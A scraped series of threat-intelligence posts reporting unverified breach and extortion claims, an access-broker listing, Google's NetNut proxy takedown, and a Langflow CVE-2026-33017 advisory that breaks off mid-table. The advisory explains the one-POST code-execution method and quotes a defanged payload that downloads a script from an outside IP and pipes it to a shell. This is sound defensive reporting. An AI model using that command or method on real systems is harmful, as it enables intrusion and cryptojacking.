](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/235789235769829837698723598711353.png) ### ⚠Potential impact If genuine, this pairs Malaysia's core national identifier (NRIC) with tax numbers, dates of birth, addresses, contact details, and, for millions of records, bank account numbers, which is the combination used for identity theft, financial fraud, and impersonation. NRIC numbers are permanent and cannot be reset, so exposure is lasting. The dataset also includes employer and company affiliations and tax filing details, adding to the fraud and phishing risk. No sample records, identifiers, or the seller's contact channel are reproduced here. The claim is unverified. ### iStatus Unverified This is a sale listing; the seller offers more samples to serious buyers. No sample records, identifiers, or the Session contact channel are reproduced here. The claim is **unverified** and LHDN has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Libyan Ministry of Education Allegedly Breached, Students' IDs and Photos Threatened With Release URL: https://darkwebinformer.com/libyan-ministry-of-education-allegedly-breached-students-ids-and-photos-threatened-with-release/ Last updated: 2026-07-02T22:23:21.000Z Breach Report ![Libya flag](https://flagcdn.com/w40/ly.png)Libya Education Involves Minors ## Libyan Ministry of Education Allegedly Breached, Students' IDs and Photos Threatened With Release A threat actor using the alias **EvaN47** claims to have breached the **Libyan Ministry of Education** (moe.gov.ly) and is threatening to publish a **287GB dataset of students' data** if the ministry does not make contact. Per the post, it includes all secondary-education completion certificates for students across Libya, students' **national ID numbers**, personal photos, passport photos, and other official documents. The sample thumbnails include students' facial photographs and identity documents; because this involves **minors' personal data**, no samples are reproduced or hosted here. This is the same actor and contact channel behind a recent breach claim against the Libyan Civil Aviation Authority. The claim is **unverified**. Severity CRITICAL Data287 GB TypeStudent records Country![Libya flag](https://flagcdn.com/w40/ly.png)Libya ActorEvaN47 ### ▣Post details TargetLibyan Ministry of Education (moe.gov.ly) Country![Libya flag](https://flagcdn.com/w40/ly.png)Libya SectorGovernment / Education Claim287 GB of student data DataCertificates, national IDs, photos ThreatPublish if no contact (extortion) ObservedJul 2, 2026 ActorEvaN47 ### !Allegedly included - 287 GB dataset - Secondary-education certificates - Students' national ID numbers - Students' personal photos - Passport photos - Official / administrative documents - Ministry system files - Involves minors' data ### ◱Screenshot(s) [ ![Libyan Ministry of Education data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/7982435698726359876235987623598723.png) Screenshot 1 Redacted: students' data ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/7982435698726359876235987623598723.png) [ ![Libyan Ministry of Education data breach sample thumbnails screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/7982435698726359876235987623598724.png) Screenshot 2 Redacted: students' data ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/7982435698726359876235987623598724.png) ### ⚠Potential impact The dataset reportedly links students' names and national ID numbers to their photos, passport photos, and education certificates. Because secondary-education students in Libya include minors, this is child-related personal data, and its exposure would create lasting risks of identity theft, fraud, and targeting, with national ID numbers and biometric photos that cannot be reset. The actor threatens to publish the data if no contact is made. The sample thumbnails are shown here only in redacted form, and no identifiers or contact channel are reproduced. The claim is unverified. ### iStatus Unverified The actor posted category descriptions, sample thumbnails, and a contact channel, and threatens publication if not contacted. No sample records, identifiers, student photos, or the contact channel are reproduced here. This matches the same actor and contact seen in a recent claim against the Libyan Civil Aviation Authority. The claim is **unverified** and the Libyan Ministry of Education has not publicly addressed it. Dark Web Informer tracks incidents like this across the [threat feed](https://darkwebinformer.com/threat-feed/) and [ransomware feed](https://darkwebinformer.com/ransomware-feed/). **Subscribers** get the full claim details and ongoing alerts. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Your Smart TV Might Be Working for Cybercriminals: Inside Google's Takedown of the NetNut Proxy Network URL: https://darkwebinformer.com/your-smart-tv-might-be-working-for-cybercriminals-inside-googles-takedown-of-the-netnut-proxy-network/ Last updated: 2026-07-02T18:20:54.000Z *How a coordinated strike against a 2-million-device botnet exposes the hidden economy of residential proxies, and what it means for anyone with a connected device at home.* --- On July 2, 2026, Google announced a coordinated action against one of the largest malicious residential proxy networks on the internet: NetNut, also tracked under the name Popa. Working alongside the FBI, Lumen, and other partners, Google's Threat Intelligence Group (GTIG) moved to dismantle infrastructure that had quietly conscripted millions of ordinary home devices into a for-hire network for cybercriminals. You can read Google's full write-up in its [Threat Intelligence blog post](https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks). This wasn't a one-off. It follows Google's [disruption of the IPIDEA proxy network](https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network) back in January 2026, and it signals an ongoing campaign rather than a single headline. ## What is a residential proxy network, anyway? Here's the part that surprises most people: the "proxies" being sold aren't rented data-center servers. They're real IP addresses belonging to real homes - yours, potentially - routed through devices sitting in living rooms around the world. Residential proxy services sell the ability to push internet traffic through IP addresses owned by ordinary consumer internet providers. Because the traffic appears to originate from a genuine home connection, it's far harder to flag as suspicious than traffic from a known data center. That's exactly why it's valuable to bad actors: it lets them mask malicious activity behind the digital fingerprint of an innocent household. To keep such a network stocked, operators need code running on home devices that quietly enrolls them as "exit nodes." Devices get pulled in one of two ways, either they ship with malware pre-installed before purchase, or their owners unknowingly install an app carrying hidden proxy code. Once enrolled, that device becomes a launchpad for someone else's traffic. ## The scale of NetNut GTIG estimates NetNut spans at least **2 million devices worldwide**, a figure that makes it one of the largest and most popular residential proxy networks in operation. Estimating the true size of these networks is notoriously difficult, but the scale here is enormous by any measure. How does a network grow that big? By targeting the gadgets people rarely think about as computers: smart TVs, streaming boxes, and set-top devices. Reporting from [KrebsOnSecurity](https://krebsonsecurity.com/2026/06/popa-botnet-linked-to-publicly-traded-israeli-firm/), confirmed by Google, describes how NetNut distributes software development kits (SDKs) for exactly these kinds of household devices. GTIG also found NetNut plugin components tied to large-scale botnets like Badbox 2.0. The distribution model has a nasty multiplier effect. Beyond selling access under its own brand, NetNut runs a reseller program that lets other companies whitelabel its network. Google says it has high confidence that many popular "residential proxy" brands are, under the hood, just reselling the NetNut botnet. ## Why this should worry ordinary device owners If your device is quietly acting as an exit node, the consequences land on you: - **Your home IP becomes an attacker's cover.** Criminals can route hacking attempts and other unauthorized activity through your address, meaning your legitimate traffic can get flagged as suspicious or outright blocked by your own service provider. - **Your home network gets exposed.** When unauthorized traffic passes through a compromised device, bad actors can potentially reach *other* private devices on the same network, turning one hijacked streaming box into a doorway to everything else in the house. And the abuse is not theoretical. In a single week during June 2026, GTIG observed **316 distinct threat clusters** using suspected NetNut exit nodes, a mix that included both cybercriminal and espionage groups. These actors used the network to hide their origin when breaking into victim environments and to run password-spray attacks, among other activity. Independent researchers at [Synthient](https://synthient.com/blog/who-are-the-victims-of-residential-proxies), [Spur](https://spur.us/blog/residential-proxy-lateral-movement-risk), and [Nokia Deepfield](https://github.com/deepfield/public-research/blob/main/reports/2026-06-18-robovpn-neunative.md) have documented NetNut being used to infect devices with variants of the Mirai DDoS botnet. ## What Google actually did Google's action against NetNut came down to three concrete moves: 1. **Cut off the command-and-control.** Google disabled the accounts and services NetNut had been abusing for malware command-and-control (C2), a direct violation of Google's Terms of Service and Acceptable Use Policy. 2. **Shared the intelligence widely.** GTIG passed technical details on NetNut's SDKs and backend C2 infrastructure to platform providers, law enforcement, and research firms, aiming for enforcement across the whole ecosystem rather than a single silo. 3. **Protected Android users automatically.** [Google Play Protect](https://support.google.com/googleplay/answer/2812853?hl=en) now warns users about, and disables, apps known to bundle NetNut SDKs, and will keep blocking future install attempts. Google says these combined actions meaningfully degraded NetNut's network and business, shrinking its available device pool by millions. ## The catch: this ecosystem is slippery Here's the sober note in Google's own assessment. After the IPIDEA takedown, GTIG learned that individual networks can look surprisingly resilient. When operators see their own botnet degraded, they often just start **buying capacity from competitors**, effectively becoming resellers themselves. The whole industry is deeply interconnected, built on overlapping botnets that are constantly bought and sold. That means a single point-in-time disruption, however large, isn't a permanent fix. Google frames lasting impact as requiring coordinated pressure on the infrastructure of *several* interconnected providers at once, and says it will keep watching how NetNut's peers adapt. ## How to protect yourself The practical guidance from Google's team is refreshingly clear: - **Be deeply skeptical of apps that pay you for "unused bandwidth" or offer to let you "share your internet."** These are a primary recruitment channel for malicious proxy networks and can open real security holes on your home network. - **Stick to official app stores**, and review the permissions requested by any third-party VPN or proxy app before installing it. - **Keep built-in protections on.** Make sure Google Play Protect is active on Android devices. - **Buy connected hardware from reputable manufacturers.** For streaming and set-top boxes, Google's [Android TV site](https://www.android.com/tv/) lists official partners, and you can [check whether your Android device is Play Protect certified](https://support.google.com/googleplay/answer/7165974). ## The bigger picture The residential proxy industry is expanding fast, and Google is explicit that this takedown is not the finish line. Operators lean on shared, resold botnets, which makes the problem structural rather than tied to any single bad actor. Google is calling on mobile platforms, ISPs, and other tech companies to keep sharing intelligence and to take direct action against malicious C2 infrastructure. For the rest of us, the takeaway is simpler and a little unsettling: the cheap smart TV or no-name streaming box in the corner isn't just a media player. In the wrong supply chain, it's an asset someone else is renting out, and worth a second look before it ends up quietly working for the other side. --- *Source:* [*Google's Continued Disruption of Malicious Residential Proxy Networks*](https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks)*, Google Threat Intelligence Group, July 2, 2026.* ### Broker miyako Advertising Root-Level Firewall Access to Five Organizations Across Four Countries URL: https://darkwebinformer.com/broker-miyako-advertising-root-level-firewall-access-to-five-organizations-across-four-countries/ Last updated: 2026-07-02T16:02:11.000Z Access Roundup ![UAE flag](https://flagcdn.com/w40/ae.png)![United States flag](https://flagcdn.com/w40/us.png)![South Korea flag](https://flagcdn.com/w40/kr.png)![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Multi-region Initial Access Broker ## Broker miyako Advertising Root-Level Firewall Access to Five Organizations Across Four Countries An initial access broker using the alias **miyako** is advertising root-level access to **five separate organizations**, each priced at **$400** (non-negotiable). Every listing describes the same access: a Linux-based **firewall appliance with Root RCE and shell permissions**, with the target's revenue listed as unknown. The targets are identified only by sector and country: a UAE oilfield services contractor, a USA retail pharmacy chain, a South Korean electronics firm, a Saudi logistics and supply-chain company, and a USA call-center operation. No company names are given, and the listings are **unverified**. Severity HIGH Listings5 Price$400 each AccessRoot RCE + Shell Actormiyako ### ▣Listing details Actormiyako (Initial Access Broker) Listings5, posted same day AccessRoot RCE + Shell DeviceFirewall (Linux) Price$400 each, non-negotiable RevenueListed as unknown ObservedJul 2, 2026 ContactWithheld (Session) ### !Targets listed - ![UAE flag](https://flagcdn.com/w40/ae.png)UAE oilfield services contractor - ![United States flag](https://flagcdn.com/w40/us.png)USA retail pharmacy chain - ![South Korea flag](https://flagcdn.com/w40/kr.png)South Korean electronics firm - ![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Saudi logistics & supply chain - ![United States flag](https://flagcdn.com/w40/us.png)USA call-center operation ### ◱Screenshots [ ![miyako initial access broker listing screenshot, UAE oilfield services contractor, July 2026 (1 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359782.png) UAE oilfield Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359782.png) [ ![miyako initial access broker listing screenshot, USA retail pharmacy chain, July 2026 (2 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359783.png) USA pharmacy Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359783.png) [ ![miyako initial access broker listing screenshot, South Korean electronics firm, July 2026 (3 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359784.png) S. Korea electronics Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359784.png) [ ![miyako initial access broker listing screenshot, Saudi logistics and supply chain, July 2026 (4 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359785.png) Saudi logistics Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359785.png) [ ![miyako initial access broker listing screenshot, USA call center operations, July 2026 (5 of 5)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359786.png) USA call center Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/45789623987569872359786.png) ### ⚠Potential impact Root-level RCE and shell access to a firewall appliance would give a buyer a strong foothold at the network perimeter, the kind of access commonly used as a starting point for ransomware and data theft. The listed targets span energy, healthcare and retail, manufacturing, and logistics across four countries, so if genuine the accesses could affect sensitive sectors. That said, none of the targets is named, the seller lists their revenue as unknown, the low flat price offers little indication of value, and none of the access is verified. The Session contact channel is not reproduced here. ### iStatus Unverified These are initial-access-broker listings advertising network access rather than a data leak; no company is named and no access has been verified. The seller's Session contact channel is not reproduced here. The same contact and access profile appear across all five posts, indicating a single batch from one broker. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Logistics Conglomerate Grupo ATC Data Offered for Sale After Ransom Refused URL: https://darkwebinformer.com/logistics-conglomerate-grupo-atc-data-offered-for-sale-after-ransom-refused/ Last updated: 2026-07-02T15:40:11.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)![United States flag](https://flagcdn.com/w40/us.png)Mexico & USA Logistics Data for Sale ## Logistics Conglomerate Grupo ATC Data Offered for Sale After Ransom Refused A threat actor using the alias **Straightonumberone** is selling what they describe as data stolen from **Grupo ATC**, a Mexican logistics conglomerate (comprising TLE, TLEA, and PHES), for **$1,000** after a ransom negotiation reportedly failed. The listing claims **23 databases, over 340GB, and more than 2 billion rows**, and says it includes employee PII (names, emails, phones, RFC, bank accounts, and CLABE), credentials and tokens (OAuth2, JWT, SFTP and API credentials, cleartext passwords, and password hashes), intercepted business emails, GPS and freight-routing data, and internal infrastructure details. The seller names major automotive and industrial partners (including Ford, Toyota, Tesla, General Motors, and Stellantis) whose data is said to be in the set. The claim is **unverified**. Severity CRITICAL Data340+ GB Price$1,000 Country![Mexico flag](https://flagcdn.com/w40/mx.png)![United States flag](https://flagcdn.com/w40/us.png)MX / US ActorStraightonumberone ### ▣Post details TargetGrupo ATC (TLE, TLEA, PHES) Country![Mexico flag](https://flagcdn.com/w40/mx.png)![United States flag](https://flagcdn.com/w40/us.png)Mexico & USA SectorLogistics / Transportation ListingFor sale ($1,000) Scale23 DBs, 340+ GB, 2B+ rows OriginRansom refused, files encrypted ObservedJul 1, 2026 ActorStraightonumberone ### !Allegedly included - 23 databases, 340+ GB - Employee PII (RFC, bank, CLABE) - Credentials & tokens (OAuth2/JWT) - Cleartext passwords & hashes - SFTP / API credentials & keys - Intercepted business emails - GPS & freight routing data - Internal infrastructure details ### ◱Screenshot(s) [ ![Grupo ATC data for sale forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2379859278365987236498723649872351.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2379859278365987236498723649872351.png) [ ![Grupo ATC data for sale forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2379859278365987236498723649872352.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2379859278365987236498723649872352.png) ### ⚠Potential impact If genuine, the exposure of credentials and tokens (OAuth2, JWT, SFTP, and API keys) alongside cleartext passwords would allow direct access to systems, while employee PII including Mexican RFC identifiers, bank account numbers, and CLABE enables financial fraud and identity theft. Because Grupo ATC is a logistics provider to major automotive and industrial firms, the seller frames the data as useful for spear-phishing and gaining initial access to those partners, giving it a supply-chain dimension. The seller says the files were encrypted and a ransom negotiation failed before the data was leaked. The claim is not verified, and no data or contact details are reproduced here. ### iStatus Unverified This is a sale listing; the seller says a ransom negotiation failed and the encrypted files are now being leaked and offered for sale, with samples gated behind the forum. No samples, credentials, or the seller's contact channels are reproduced here. The claim is **unverified** and Grupo ATC has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Libyan Civil Aviation Authority Allegedly Breached, 300GB of Aviation Data Advertised URL: https://darkwebinformer.com/libyan-civil-aviation-authority-allegedly-breached-300gb-of-aviation-data-advertised/ Last updated: 2026-07-01T18:46:39.000Z Breach Report ![Libya flag](https://flagcdn.com/w40/ly.png)Libya Aviation ## Libyan Civil Aviation Authority Allegedly Breached, 300GB of Aviation Data Advertised A threat actor using the alias **EvaN47** has posted what they describe as a breach of the **Libyan Civil Aviation Authority** (caa.gov.ly), advertising a roughly **300GB dataset spanning 2015 to 2026** with a contact for acquisition. Per the post, it covers the authority's core sectors: pilot, engineer, and air-traffic-controller licensing; aircraft registration, airworthiness, and maintenance logs; air traffic and airspace management with flight data and NOTAMs; safety incident reports and investigation files; administration and finance including HR and payroll; and the electronic services portal. The actor claims the ability to **retrieve and modify records**, and included sample pilot and engineer licences and a medical certificate. The claim is **unverified**. Severity CRITICAL Data\~300 GB Span2015 to 2026 Country![Libya flag](https://flagcdn.com/w40/ly.png)Libya ActorEvaN47 ### ▣Post details TargetLibyan Civil Aviation Authority (caa.gov.ly) Country![Libya flag](https://flagcdn.com/w40/ly.png)Libya SectorGovernment / Aviation Dataset\~300 GB, 2015 to 2026 Access claimRetrieve and modify records SamplesPilot / engineer licences, medical cert ObservedJul 1, 2026 ActorEvaN47 ### !Allegedly included - \~300 GB dataset - Pilot / engineer / ATC licensing - Aircraft registration & airworthiness - Maintenance & failure logs - Air traffic & airspace data (NOTAMs) - Safety & investigation files - HR & payroll records - Personal licence documents & photos ### ◱Screenshot(s) [ ![Libyan Civil Aviation Authority data breach forum post screenshot, July 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/234578962387956987623598723659876231.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/234578962387956987623598723659876231.png) [ ![Libyan Civil Aviation Authority medical certificate sample screenshot, July 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/234578962387956987623598723659876232.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/234578962387956987623598723659876232.png) [ ![Libyan Civil Aviation Authority maintenance engineer licence sample screenshot, July 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/234578962387956987623598723659876233.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/234578962387956987623598723659876233.png) ### ⚠Potential impact The dataset reportedly combines personal data on aviation professionals (names, photos, dates of birth, addresses, licence numbers, and medical certificates) with the authority's operational and administrative systems. Beyond identity-theft and fraud risk for the individuals, the post claims access to air traffic and airspace management data, safety investigation files, and the ability to modify records, which if accurate would carry aviation-safety and national-security implications. The dataset is not verified, and no data or contact details are reproduced here. ### iStatus Unverified The actor advertised the dataset with a contact channel and included sample documents; no sample records, personal details, or the contact channel are reproduced here. The claim is **unverified** and the Libyan Civil Aviation Authority has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Data From Domain Registrar and Host Netim Allegedly Offered for Sale, Including Source Code and Customer Records URL: https://darkwebinformer.com/data-from-domain-registrar-and-host-netim-allegedly-offered-for-sale-including-source-code-and-customer-records/ Last updated: 2026-07-01T16:42:47.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Technology Data for Sale ## Data From Domain Registrar and Host Netim Allegedly Offered for Sale, Including Source Code and Customer Records A threat actor using the alias **lucy** is advertising a private, one-time sale of what they describe as comprehensive data from **Netim.com**, a French domain registrar and hosting provider, for **$5,000** in cryptocurrency. Per the listing, the data includes a **16.5 million-document Elasticsearch cluster** covering payments, sales, domains, support tickets, hosting, affiliates, SSL details, and staff accounts; an internal database dump with customer master records (names, addresses, phone numbers, emails, **password hashes**, account balances, and VAT details) dated up to March 2024; SQL dumps from billing, hosting, and production systems; and complete **source-code repositories** with configuration files, credentials, and internal infrastructure layouts. The seller says samples will be provided only after proof of funds. The claim is **unverified**. Severity CRITICAL Data16.5M docs Price$5,000 Country![France flag](https://flagcdn.com/w40/fr.png)France Actorlucy ### ▣Post details TargetNetim.com (domain registrar / host) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorTechnology / Hosting ListingPrivate one-time sale ($5,000) DataCustomer records, source code, payments FreshnessMain DB up to March 2024 ObservedJun 30, 2026 Actorlucy ### !Allegedly included - 16.5M Elasticsearch documents - Customer master records - Password hashes - Payments & account balances - VAT & reseller / affiliate data - SSL details & support tickets - Source code (full Git history) - Config files, credentials, infra layouts ### ◱Screenshot [ ![Netim domain registrar data for sale forum post screenshot, June 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/237685487912364987635249871298764124.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/237685487912364987635249871298764124.png) ### ⚠Potential impact This is a critical-severity listing because the target is a domain registrar and hosting provider, and the claimed data reaches deep into both customer records and the provider's own infrastructure. If genuine, the customer side (names, addresses, phones, emails, password hashes, account balances, and VAT details across millions of documents) enables identity theft, financial fraud, and credential attacks, while the provider side (SSL details, source code with credentials, configuration files, and internal infrastructure layouts) is far more dangerous: it could facilitate domain hijacking, interception of encrypted traffic, and compromise of hosted customer websites and the registrar's own systems. Because registrars sit at the root of domain and certificate trust, a breach of this kind can cascade to the provider's entire customer base. That said, the main database is dated to March 2024, and as an unverified sale offer with samples withheld pending payment, the claim may be exaggerated or recycled from an earlier incident. No sample data, credentials, or seller contact details are reproduced here. ### iStatus Unverified This is a sale listing offering samples only after proof of funds; no samples, credentials, or the seller's or middlemen's contact details are reproduced here. Part of the data is dated to March 2024, which may indicate older or recycled material. The claim has **not been independently confirmed** and Netim has not publicly addressed it. If accurate, the exposure of credentials, SSL details, and source code would warrant urgent credential rotation and customer notification. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### One POST to RCE: Unauthenticated Code Execution in Langflow (CVE-2026-33017) URL: https://darkwebinformer.com/one-post-to-rce-unauthenticated-code-execution-in-langflow-cve-2026-33017/ Last updated: 2026-06-30T18:25:07.000Z Critical CVSS 4.0 9.3 Status Actively Exploited CISA KEV Added 2026-03-25 # One POST to RCE: Unauthenticated Code Execution in Langflow (CVE-2026-33017) Langflow AI Platform • CWE-94 / CWE-306 Code Injection + Missing Auth • Published 2026-03-20 ## Vulnerability Overview [CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017) is a critical unauthenticated remote code execution flaw in **Langflow**, the popular open-source visual framework for building AI agents and RAG pipelines. Rated **CVSS v4.0 9.3**, it combines missing authentication with code injection: a single HTTP POST to the public flow build endpoint runs attacker-supplied Python on the server with no credentials and no sandbox. It affects all versions up to and including 1.8.1\. The flaw was disclosed on March 17, 2026, exploited in the wild within roughly 20 hours, and [added to the CISA Known Exploited Vulnerabilities catalog](https://www.cisa.gov/news-events/alerts/2026/03/25/cisa-adds-one-known-exploited-vulnerability-catalog) on March 25, 2026. CVE ID CVE-2026-33017 CVSS Score 9.3 - Critical Weakness CWE-94 / 95 / 306 Affected Product Langflow Affected Versions ≤ 1.8.1 Attack Vector Network / Unauthenticated Exploitation In the Wild (KEV) Fixed In 1.9.0 Bottom Line If you run Langflow 1.8.1 or earlier and it is reachable from the internet, assume it is being scanned. Upgrade to 1.9.0 now, take it off the public internet, and rotate any API keys or credentials the instance could touch. ## Why Langflow Is a High-Value Target Langflow has 145,000+ GitHub stars, which translates into a large population of internet-exposed instances, many spun up by data science and ML teams that do not patch on the same cadence as production infrastructure. More importantly, these instances are credential-rich by design: they are routinely configured with API keys for OpenAI, Anthropic, and AWS, plus database connection strings. Compromising one box does not just give an attacker compute; it can hand over keys to cloud accounts and data stores, turning a single exposed AI tool into a launchpad for lateral movement and software supply chain compromise. That combination of broad exposure and concentrated secrets is exactly why attackers have started scanning AI application infrastructure specifically. ## Technical Analysis The vulnerable code is the `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint, which exists to let unauthenticated users build and run **public flows**. As the [official advisory](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx) explains, the endpoint accepts an optional `data` parameter, and when that parameter is supplied it uses the attacker-controlled flow data, containing arbitrary Python in its node definitions, instead of the stored server-side flow from the database. That data flows into the graph builder and is ultimately handed to `exec()` with zero sandboxing, producing unauthenticated RCE. In the source (`chat.py`), the handler simply lacks any `get_current_active_user` dependency, so there is no identity check before attacker code runs. Exploitation is about as simple as RCE gets. The researcher who reported it, Aviral Srivastava, described it as extremely easy and triggerable with a weaponized `curl`: one POST request carrying malicious Python in a JSON payload yields immediate code execution with the full privileges of the server process. From there an attacker can read environment variables (where the API keys live), modify files to plant backdoors, wipe data, or open a reverse shell. It is worth distinguishing this from [CVE-2025-3248](https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html), an earlier Langflow RCE that was fixed by adding authentication to `/api/v1/validate/code`. CVE-2026-33017 reaches the same dangerous `exec()` call at the end of the chain, but through a different door, and per the reporter the genuine fix is not simply bolting auth onto a deliberately public endpoint. It is removing the `data` parameter from the public path entirely, so public flows can only execute their stored server-side definitions and never attacker-supplied code. That is the change shipped in 1.9.0. ## Active Exploitation This vulnerability is a poster child for collapsing time-to-exploit. The [Sysdig Threat Research Team](https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours) observed the first in-the-wild exploitation roughly 20 hours after the advisory, at a point when no public PoC existed at all. Attackers built working exploits straight from the advisory text and began mass-scanning, with multiple source IPs sending an identical payload within minutes of each other. Public PoCs followed soon after, removing even that small amount of effort. [Trend Micro tracked a cryptomining campaign](https://www.trendmicro.com/en/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html) using the flaw as its front door. The initial access payload is a compact one-liner, roughly `__import__('os').system('curl hxxp://83[.]142[.]209[.]214:8080/isp.sh | sh')`, which pulls down a UPX-packed Go miner. That binary disables host security controls, runs a 39-entry rival-miner kill list, deploys a Monero miner, establishes persistence, and spreads to other hosts through reused SSH keys, turning one exposed Langflow instance into a worm-able foothold. The compute theft degrades performance and inflates cloud bills, but the SSH-key spread and credential access are the more serious long-term risks. ## Affected Versions & Fixes | Langflow Version | Status | Resolution | | ---------------- | ---------- | 